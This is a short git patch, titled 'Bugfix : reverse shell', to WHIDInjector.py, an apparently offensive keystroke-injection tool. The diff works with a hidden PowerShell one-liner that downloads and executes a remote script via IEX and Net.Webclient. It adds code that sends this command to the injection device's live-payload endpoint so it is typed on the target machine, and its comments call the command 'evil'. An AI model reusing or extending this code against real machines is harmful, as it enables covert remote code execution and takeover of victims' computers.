From 5936a85c29b8356de8d55edbb6ea837b0d508f2f Mon Sep 17 00:00:00 2001 From: Swissky Date: Fri, 1 Dec 2017 15:38:51 +0100 Subject: [PATCH] Bugfix : reverse shell --- WHIDInjector.py | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/WHIDInjector.py b/WHIDInjector.py index b0280f8..cc0df0d 100644 --- a/WHIDInjector.py +++ b/WHIDInjector.py @@ -145,6 +145,11 @@ if __name__ == "__main__": args = user_input.split(" ") user_input = "powershell -W Hidden -nop -noni -c \"IEX (New-Object Net.Webclient).downloadstring('%s')\"" % args[1] + # Send the payload + user_converted = convert_to_keymap(txt, "CustomDelay:1000\nPrint:%s\nCustomDelay:1000\nPress:176") + send_payload(user_converted, results.panel+"/runlivepayload") + + # Send simple text without using a payload chain elif 'send' == user_input.split(' ')[0]: # Convert the simple text to keymap @@ -155,9 +160,10 @@ if __name__ == "__main__": # Send the payload send_payload(user_converted, results.panel+"/runlivepayload") + continue # Send evil command with default payload - elif user_input != "": + if user_input != "": # Convert from AZERTY to QWERTY user_converted = convert_to_keymap(user_input, payload)